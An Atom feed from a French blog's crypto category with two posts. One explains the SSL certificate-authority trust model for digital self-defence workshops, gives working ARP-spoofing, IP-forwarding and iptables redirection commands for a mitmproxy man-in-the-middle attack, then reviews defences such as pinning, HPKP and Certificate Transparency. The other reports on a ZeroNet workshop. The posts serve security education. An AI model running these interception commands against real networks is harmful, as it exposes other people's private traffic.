<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom"><title>Carnets en ligne - crypto</title><link href="https://blog.notmyidea.org/" rel="alternate"></link><link href="https://blog.notmyidea.org/feeds/crypto.atom.xml" rel="self"></link><id>https://blog.notmyidea.org/</id><updated>2016-03-25T00:00:00+01:00</updated><entry><title>Avez vous confiance en SSL?</title><link href="https://blog.notmyidea.org/avez-vous-confiance-en-ssl.html" rel="alternate"></link><published>2016-03-25T00:00:00+01:00</published><updated>2016-03-25T00:00:00+01:00</updated><author><name></name></author><id>tag:blog.notmyidea.org,2016-03-25:/avez-vous-confiance-en-ssl.html</id><summary type="html">&lt;p&gt;Dans le cadre &lt;a href="http://autodefense-numerique.readthedocs.org/en/latest/"&gt;des ateliers d'autodéfense numérique&lt;/a&gt;,
j'ai passé un peu de temps à creuser sur l'utilisation de SSL puisque
contrairement à ce que la plupart des personnes ont encore tendance à croire,
le petit cadenas (qui prouve qu'une connexion SSL est en cours) n'est
&lt;strong&gt;absolument&lt;/strong&gt; pas suffisant.&lt;/p&gt;
&lt;p&gt;Allez hop …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Dans le cadre &lt;a href="http://autodefense-numerique.readthedocs.org/en/latest/"&gt;des ateliers d'autodéfense numérique&lt;/a&gt;,
j'ai passé un peu de temps à creuser sur l'utilisation de SSL puisque
contrairement à ce que la plupart des personnes ont encore tendance à croire,
le petit cadenas (qui prouve qu'une connexion SSL est en cours) n'est
&lt;strong&gt;absolument&lt;/strong&gt; pas suffisant.&lt;/p&gt;
&lt;p&gt;Allez hop, c'est parti pour:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;un tour d'horizon du fonctionnement de SSl&lt;/li&gt;
&lt;li&gt;quelques moyens contourner cette "protection" en faisant une attaque en pratique&lt;/li&gt;
&lt;li&gt;un tour des solutions existantes actuellement et de pourquoi je ne les trouve
  pas vraiment satisfaisantes.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Comment fonctionne SSL?&lt;/h2&gt;
&lt;p&gt;Pour expliquer les problèmes de SSL, j'ai d'abord besoin d'expliquer comment
tout ça fonctionne.&lt;/p&gt;
&lt;p&gt;SSL repose sur l'utilisation de certificats, qui sont générés par des autorités
de certification (&lt;em&gt;Certificate Authority&lt;/em&gt; que je nomme &lt;em&gt;CA&lt;/em&gt; dans la suite de
l'article).&lt;/p&gt;
&lt;p&gt;Les certificats SSL permettent deux choses:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;De garantir que les communications entre les navigateurs (vous) et les sites
  Web ne sont connues que du détenteur du certificat du site et de vous même.&lt;/li&gt;
&lt;li&gt;De garantir que le site sur lequel vous vous connectez est bien celui que
  vous imaginez.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Le navigateur, lors d'une visite d'un site, va télécharger le certificat
associé puis vérifier que le certificat en question a bien été généré par un
des &lt;em&gt;CA&lt;/em&gt; en qui il a confiance.&lt;/p&gt;
&lt;p&gt;Imaginons maintenant qu'une des &lt;em&gt;CA&lt;/em&gt; essaye de savoir ce qui s'échange entre
mon navigateur et le site de ma banque (protégé par SSL). Comment cela se
passerait il ?&lt;/p&gt;
&lt;p&gt;N'importe quel &lt;em&gt;CA&lt;/em&gt; peut donc générer des certificats pour n'importe quel site,
et le navigateur vérifierait, lui, que le certificat a bien été généré par une
&lt;em&gt;CA&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Tout cela ne poserait pas de soucis si les &lt;em&gt;CA&lt;/em&gt; étaient gérés de manière fiable,
mais il s'agit d'un travail compliqué, et certains &lt;em&gt;CA&lt;/em&gt; ont par le passé montré
des faiblesses.&lt;/p&gt;
&lt;p&gt;Par exemple, &lt;a href="https://en.wikipedia.org/wiki/DigiNotar"&gt;DigiNotar&lt;/a&gt; (un &lt;em&gt;CA&lt;/em&gt; des Pays-Bas)
a été compromise et les attaquant.e.s ont pu générer des certificats SSL
frauduleux, ce qui leur a permis d'attaquer des sites tels que Facebook ou GMail.&lt;/p&gt;
&lt;p&gt;Vous pouvez retrouver une liste des risques et menaces autour des &lt;em&gt;CA&lt;/em&gt; &lt;a href="http://wiki.cacert.org/Risk/History"&gt;sur le
wiki de CACert&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Attaque de l'homme du milieu avec SSL&lt;/h2&gt;
&lt;p&gt;A force de dire que c'était très facile à faire, j'ai eu envie d'essayer
d'espionner des connections protégées par SSL, et effectivement c'est
carrément flippant tellement c'est simple.&lt;/p&gt;
&lt;p&gt;En l'espace de quelques minutes, il est possible de faire une &lt;em&gt;attaque de
l'homme du milieu&lt;/em&gt; en utilisant par exemple un outil nommé &lt;a href="http://docs.mitmproxy.org/en/stable"&gt;mitm-proxy&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Pour déchiffrer l'ensemble du trafic SSL, j'ai simplement eu à lancer quelques
commandes et avoir un &lt;em&gt;CA&lt;/em&gt; dans lequel le navigateur de la victime a confiance.
Je l'ai ajouté dans le navigateur cible pour simuler que je l'avais déjà
(c'est le cas si un des 1200 CA se fait pirater, ce qui me semble une surface
d'attaque assez large).&lt;/p&gt;
&lt;p&gt;Je les colle ici si ça vous intéresse:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;$ sudo aptitude install mitmproxy
$ mitm-proxy -T --host
&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Il faut faire croire à votre victime que vous êtes la passerelle vers
l'extérieur et à la passerelle que vous êtes la victime:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;arpspoof -i wlan0 -t victime gateway
arpspoof -i wlan0 -t gateway victime
&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Puis dire à notre fausse passerelle de rediriger le trafic des ports 80 et 443
vers notre proxy:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;sudo sysctl -w net.ipv4.ip_forward&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport &lt;span class="m"&gt;443&lt;/span&gt; -j REDIRECT --to-port &lt;span class="m"&gt;4443&lt;/span&gt;
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport &lt;span class="m"&gt;80&lt;/span&gt; -j REDIRECT --to-port &lt;span class="m"&gt;4443&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Et paf, &lt;strong&gt;on voit tout ce qui passe entre la machine et le serveur SSL&lt;/strong&gt;. On peut
d'ailleurs même imaginer faire tourner ces quelques commandes sur un
raspberry pi, pour aller encore plus vite…&lt;/p&gt;
&lt;h3&gt;Key-pinning dans les navigateurs&lt;/h3&gt;
&lt;p&gt;Actuellement, n'importe quel &lt;em&gt;CA&lt;/em&gt; peut générer des certificats pour
n'importe quel site, et c'est en grande partie ce qui pose souci. Une des
manières de faire évoluer la situation est d'épingler les certificats de
certains sites directement dans les navigateurs.&lt;/p&gt;
&lt;p&gt;Cette approche a le mérite de fonctionner très bien &lt;a href="https://dxr.mozilla.org/mozilla-central/source/security/manager/ssl/StaticHPKPins.h?from=StaticHPKPins.h"&gt;pour un petit nombre de
sites critiques (Google, Facebook, etc)&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;HTTP Public Key Pinning (HPKP)&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://developer.mozilla.org/en/docs/Web/Security/Public_Key_Pinning"&gt;&lt;em&gt;HTTP Public Key Pinning&lt;/em&gt;&lt;/a&gt;
est également une solution de &lt;em&gt;pinning&lt;/em&gt; qui permet d'établir une confiance lors
de la première connexion avec le site. C'est ce qu'on appelle du &lt;em&gt;Trust on First
Use&lt;/em&gt; ou &lt;em&gt;TOFU&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Le navigateur va alors mettre ces informations dans un cache et vérifiera que
les certificats correspondent bien lors des prochaines visites.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;HPKP&lt;/em&gt; est disponible dans Firefox depuis Janvier 2015 et dans Chrome
depuis Octobre 2015.&lt;/p&gt;
&lt;h3&gt;Certificate transparency: des journaux auditables&lt;/h3&gt;
&lt;p&gt;Une autre approche est celle proposée par &lt;em&gt;certificate transparency&lt;/em&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Certificate Transparency aims to remedy these certificate-based threats by
making the issuance and existence of SSL certificates open to scrutiny by
domain owners, CAs, and domain users.&lt;/p&gt;
&lt;p&gt;-- &lt;a href="https://www.certificate-transparency.org/what-is-ct"&gt;Certificate Transparency&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Autrement dit, avec ce système les &lt;em&gt;CA&lt;/em&gt; doivent rendre public le fait qu'ils
aient signé de nouveaux certificats intermédiaires. La signature est ajoutée à
un journal sur lequel il n'est possible que d'écrire.&lt;/p&gt;
&lt;p&gt;Les navigateurs vont alors vérifier que les certificats utilisés sont bien des
certificats qui ont été ajoutés au journal.&lt;/p&gt;
&lt;p&gt;Ici, toute l'intelligence est dans la vérification de ces journaux, qui
permettent donc de valider/invalider des certificats racines ou intermédiaires.&lt;/p&gt;
&lt;p&gt;Il me semble donc qu'il serait possible d'ajouter un certificat frauduleux le
temps d'une attaque (et celui ci serait détecté et supprimé ensuite).&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Certificate-Transparency&lt;/em&gt; n'est donc pas une solution contre une écoute
globale mise en place par les gouvernements par exemple.&lt;/p&gt;
&lt;p&gt;Si vous lisez bien l'anglais, je vous invite à aller lire
&lt;a href="http://security.stackexchange.com/a/52838"&gt;cette description du problème et de la solution&lt;/a&gt;
que je trouve très bien écrite.&lt;/p&gt;
&lt;h3&gt;DANE + DNSSEC&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;The DANE working group has developed a framework for securely
retrieving keying information from the DNS [RFC6698]. This
framework allows secure storing and looking up server public key
information in the DNS. This provides a binding between a domain
name providing a particular service and the key that can be used
to establish encrypted connection to that service.&lt;/p&gt;
&lt;p&gt;-- &lt;a href="https://datatracker.ietf.org/wg/dane/charter/"&gt;Dane WG&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Une autre solution est appelée "DANE" et repose par dessus le protocole
&lt;em&gt;DNSSEC&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Je connais assez mal &lt;em&gt;DNSSEC&lt;/em&gt; donc j'ai passé un peu de temps à lire des
documents. L'impression finale que ça me laisse est que le problème est
exactement le même que pour SSL: un certain nombre de personnes détiennent les
clés et toute la sécurité repose sur cette confiance. Or il est possible que
ces clés soient détenues par des personnes non dignes de confiance.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Secure DNS (DNSSEC) uses cryptographic digital signatures signed with a
trusted public key certificate to determine the authenticity of data.
-- https://en.wikipedia.org/wiki/DNS_spoofing&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Et aussi:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It is widely believed[1] that securing the DNS is critically important for
securing the Internet as a whole, but deployment of DNSSEC specifically has
been hampered (As of 22 January 2010) by several difficulties:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The need to design a backward-compatible standard that can scale to the
  size of the Internet&lt;/li&gt;
&lt;li&gt;Prevention of "zone enumeration" (see below) where desired&lt;/li&gt;
&lt;li&gt;Deployment of DNSSEC implementations across a wide variety of DNS servers
  and resolvers (clients)&lt;/li&gt;
&lt;li&gt;Disagreement among implementers over who should own the top-level domain
  root keys Overcoming the perceived complexity of DNSSEC and DNSSEC
  deployment&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Solutions basées sur la blockchain&lt;/h2&gt;
&lt;p&gt;Une dernière piste semble être l'utilisation de la &lt;em&gt;blockchain&lt;/em&gt; pour distribuer
des clés par site.&lt;/p&gt;
&lt;p&gt;La solution &lt;em&gt;DNSChain&lt;/em&gt; me paraissait tout d'abord un bon point de départ mais
la lecture de &lt;a href="https://www.indolering.com/okturtles-dnschain-unblock-us"&gt;quelques critiques&lt;/a&gt;
et interventions du développeur du projet m'ont fait changer d'avis.&lt;/p&gt;
&lt;p&gt;Reste encore la piste de &lt;em&gt;Namecoin Control&lt;/em&gt; que je n'ai pas encore creusée.
Peut-être pour un prochain billet. Toute piste de réflexion est bien sur la
bienvenue sur ces sujets!&lt;/p&gt;</content><category term="crypto"></category></entry><entry><title>Retours sur un atelier ZeroNet</title><link href="https://blog.notmyidea.org/retours-sur-un-atelier-zeronet.html" rel="alternate"></link><published>2016-03-17T00:00:00+01:00</published><updated>2016-03-17T00:00:00+01:00</updated><author><name></name></author><id>tag:blog.notmyidea.org,2016-03-17:/retours-sur-un-atelier-zeronet.html</id><summary type="html">&lt;p&gt;Mardi dernier se tenait &lt;a href="http://biblio.insa-rennes.fr/crypto"&gt;une &lt;em&gt;cryptoparty&lt;/em&gt;&lt;/a&gt; dans les locaux de l'INSA de Rennes.&lt;/p&gt;
&lt;p&gt;L'évènement s'étant rempli au delà de toutes les espérances, on m'a proposé de
venir y tenir un atelier, que j'ai proposé sur &lt;a href="https://zeronet.io"&gt;ZeroNet&lt;/a&gt;, un
petit projet fort sympathique qui pourrait devenir une nouvelle manière de
distribuer le …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Mardi dernier se tenait &lt;a href="http://biblio.insa-rennes.fr/crypto"&gt;une &lt;em&gt;cryptoparty&lt;/em&gt;&lt;/a&gt; dans les locaux de l'INSA de Rennes.&lt;/p&gt;
&lt;p&gt;L'évènement s'étant rempli au delà de toutes les espérances, on m'a proposé de
venir y tenir un atelier, que j'ai proposé sur &lt;a href="https://zeronet.io"&gt;ZeroNet&lt;/a&gt;, un
petit projet fort sympathique qui pourrait devenir une nouvelle manière de
distribuer le Web, permettant notamment d'éviter la censure.&lt;/p&gt;
&lt;p&gt;Avant toute autre chose, merci énormément à l'équipe de la bibliothèque de
l'INSA pour l'organisation de cet évènement qui à une réelle portée politique.&lt;/p&gt;
&lt;h2&gt;Un peu d'histoire&lt;/h2&gt;
&lt;p&gt;Il me semble que Tim Bernes Lee (l'inventeur du Web) avait prévu le Web comme un
protocole décentralisé. Chacun hébergerait ses données et les servirait aux
autres, qui pourraient alors y accéder.&lt;/p&gt;
&lt;p&gt;Avec ce fonctionnement, impossible alors d'accéder à des sites si leur auteur
n'est pas en ligne. Qu'à cela ne tienne, on s'est mis à avoir des machines qui
restent connectées au réseau 24 heures par jour. Et puis une machine ne
suffisant plus, on a eu des fermes de machines dans des &lt;em&gt;data centers&lt;/em&gt; etc afin
de supporter les milliers d'utilisateurs des sites.&lt;/p&gt;
&lt;h2&gt;Un Web décentralisé&lt;/h2&gt;
&lt;p&gt;ZeroNet permet (entre autres) de répondre à ce problème en proposant une manière alternative de &lt;strong&gt;distribuer le Web&lt;/strong&gt;, en pair à pair. Lors d'une visite d'un site:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Vous contactez un &lt;em&gt;tracker&lt;/em&gt; BitTorrent pour connaitre la liste des autres
   visiteurs du site (les &lt;em&gt;pairs&lt;/em&gt;).&lt;/li&gt;
&lt;li&gt;Vous demandez aux &lt;em&gt;pairs&lt;/em&gt; de vous donner les fichiers du site.&lt;/li&gt;
&lt;li&gt;Vous validez que les fichiers servis sont bien les bons (en vérifiant la
   signature attachée).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;N'importe quel visiteur devient alors un &lt;em&gt;pair&lt;/em&gt;, qui sert le site aux autres
visiteurs.&lt;/p&gt;
&lt;p&gt;Parmi les nombreux avantages de cette approche, je note particulièrement que:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Il est très difficile de censurer un site — Il est sur l'ensemble des machines
  des visiteurs.&lt;/li&gt;
&lt;li&gt;Les attaques par &lt;em&gt;fingerprinting&lt;/em&gt; sont impossibles: le navigateur Web se
  connecte à un serveur &lt;em&gt;proxy&lt;/em&gt; local.&lt;/li&gt;
&lt;li&gt;Vous détenez directement vos données et (par design) ne les donnez pas à des
  silos (Facebook, Google, etc.)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Si vous êtes interessés par une démonstration rapide, j'ai enregistré une vidéo
de 10 minutes où je parle en anglais avec une voix très grave.&lt;/p&gt;
&lt;video controls="" src="http://alexis.notmyidea.org/zeronet.webm" width=800&gt;&lt;/video&gt;

&lt;h2&gt;Atelier&lt;/h2&gt;
&lt;p&gt;Pour l'atelier, j'ai choisi de faire une présentation rapide du projet (&lt;a href="{filename}/static/zeronet-presentation-fr.pdf"&gt;j'ai
traduit les slides&lt;/a&gt; anglais
pour l'occasion — &lt;a href="https://docs.google.com/presentation/d/158C_-V1ueNaaKHMBMBgGOVhunb9xrXzB3hC_g1N53c0/edit?usp=sharing"&gt;accès aux sources&lt;/a&gt;)
avant d'installer ZeroNet sur les machines et de l'utiliser pour publier un
site.&lt;/p&gt;
&lt;h3&gt;Partager sur le réseau local&lt;/h3&gt;
&lt;p&gt;Nous avons eu des soucis à cause du réseau (un peu congestionné) sur lequel
les ports utilisés pour la discussion entre &lt;em&gt;pairs&lt;/em&gt; étaient fermés. Il est bien
sur possible de faire tourner le tout de manière indépendante du reste du réseau,
mais je n'avais pas prévu le coup.&lt;/p&gt;
&lt;p&gt;Voici donc comment faire pour contourner le souci:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Installer et lancer un &lt;em&gt;tracker&lt;/em&gt; BitTorrent (De manière surprenante,
   &lt;a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=685575"&gt;rien n'est packagé pour debian pour l'instant&lt;/a&gt;)
   J'ai choisi d'installer &lt;a href="http://erdgeist.org/arts/software/opentracker/#build-instructions"&gt;OpenTracker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Ensuite lancer ZeroNet avec des options spécifiques.&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;$ python zeronet.py --trackers udp://localhost:6969 --ip_external &lt;span class="m"&gt;192&lt;/span&gt;.168.43.207
$ python zeronet.py --trackers udp://192.168.43.207:6969 --ip_external &lt;span class="m"&gt;192&lt;/span&gt;.168.43.172
&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Il est nécessaire de spécifier l'adresse IP externe que chaque nœud expose pour
éviter qu'elle n'essaye d'aller la trouver par elle même: nous voulons l'adresse
du réseau local, et non pas l'adresse internet.&lt;/p&gt;
&lt;p&gt;La prochaine fois je tenterais de venir avec un HotSpot Wifi et un tracker
BitTorrent dans la poche!&lt;/p&gt;
&lt;h2&gt;Questions / Réponses&lt;/h2&gt;
&lt;p&gt;Il y avait quelques questions intéressantes auxquelles je n'ai pas toujours su
répondre sur le moment. Après quelques recherches, je rajoute des détails ici.&lt;/p&gt;
&lt;h3&gt;Torrent + Tor = brèche de sécu ?&lt;/h3&gt;
&lt;p&gt;Il me semblait avoir entendu parler de problèmes de &lt;em&gt;dé-anonymisation&lt;/em&gt;
&lt;a href="https://hal.inria.fr/file/index/docid/471556/filename/TorBT.pdf"&gt;lors de l'utilisation de BitTorrent par dessus Tor&lt;/a&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Dans certains cas, certains clients torrents (uTorrent, BitSpirit, etc)
écrivent directement votre adresse IP dans l'information qui est envoyée
au tracker et/ou aux autres pairs.
— https://blog.torproject.org/blog/bittorrent-over-tor-isnt-good-idea&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="https://github.com/HelloZeroNet/ZeroNet/issues/274"&gt;Ce n'est pas le cas de ZeroNet&lt;/a&gt;, ce qui évacue le souci.&lt;/p&gt;
&lt;h3&gt;ZeroMail, c'est lent non ?&lt;/h3&gt;
&lt;p&gt;Une des applications de démo, &lt;em&gt;ZeroMail&lt;/em&gt;, propose un mécanisme qui permet de
s'envoyer des messages chiffrés sur un réseau pair à pair. L'approche choisie
est de chiffrer les messages avec la clé du destinataire et de le mettre dans
un &lt;em&gt;pot commun&lt;/em&gt;. Tout le monde essaye de déchiffrer tous les messages, mais ne
peut déchiffrer que les siens.&lt;/p&gt;
&lt;p&gt;Cela permet de ne &lt;strong&gt;pas&lt;/strong&gt; fuiter de méta-données, &lt;a href="{filename}../crypto/2015.05.pgp-problemes.rst"&gt;à l'inverse de PGP&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Je n'ai en fait pas de réponse claire à donner à cette question: l'auteur de
ZeroNet me disait que 10MB (la limite de taille d'un site, par défaut)
correspondait à beaucoup de place pour stocker des messages, et qu'il était
possible de supprimer les anciens messages une fois qu'ils sont lus par exemple.&lt;/p&gt;
&lt;p&gt;Une autre solution à laquelle je pensait était de créer un &lt;em&gt;ZeroSite&lt;/em&gt; pour
chaque récipient, mais on connait à ce moment là le nombre de messages qu'un
utilisateur peut recevoir.&lt;/p&gt;
&lt;p&gt;Je vois plusieurs problèmes avec le design actuel de ZeroMail (il me semble
assez facile d'y faire un déni de service par exemple). A creuser.&lt;/p&gt;
&lt;h3&gt;Comment héberger des très gros sites ?&lt;/h3&gt;
&lt;p&gt;Par exemple, comment faire pour héberger Wikipedia ?&lt;/p&gt;
&lt;p&gt;Il semble que la meilleure manière de faire serait de séparer Wikipedia en
un tas de petites ressources (par catégorie par ex.). Les gros médias pourraient
être considérés optionnels (et donc téléchargés uniquement à la demande)&lt;/p&gt;
&lt;h3&gt;Est-ce qu'on à vraiment besoin d'un tracker ?&lt;/h3&gt;
&lt;p&gt;Le support d'une DHT &lt;a href="https://github.com/HelloZeroNet/ZeroNet/issues/57"&gt;est souhaité&lt;/a&gt;,
mais pour l'instant pas encore implémenté. L'utilisation de la DHT BitTorrent
n'est pas une option puisque &lt;a href="https://github.com/HelloZeroNet/ZeroNet/issues/57"&gt;Tor ne supporte pas UDP&lt;/a&gt;.&lt;/p&gt;</content><category term="crypto"></category></entry></feed>